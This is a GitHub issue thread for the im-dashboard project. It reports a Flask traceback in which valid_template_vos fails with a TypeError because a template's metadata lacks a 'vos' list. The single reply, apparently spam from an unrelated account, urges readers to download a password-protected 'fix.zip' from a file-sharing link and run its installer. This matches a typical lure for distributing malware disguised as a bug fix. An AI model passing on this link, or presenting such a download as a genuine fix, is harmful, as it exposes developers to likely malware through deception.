### ISSUE TITLE
Error configuing some templates

### ISSUE THREAD

**Issue by micafer** [grycap/im-dashboard#567]
Log message:

````
ERROR in app: Exception on /configure [GET]
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/site-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/site-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/app/app/__init__.py", line 146, in decorated_function
    return f(*args, **kwargs)
  File "/app/app/__init__.py", line 744, in configure
    if child in toscaInfo and utils.valid_template_vos(session['vos'], toscaInfo[child]["metadata"]):
  File "/app/app/utils.py", line 850, in valid_template_vos
    return [vo for vo in user_vos if vo in template_metadata['vos']]
TypeError: 'NoneType' object is not iterable
````

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
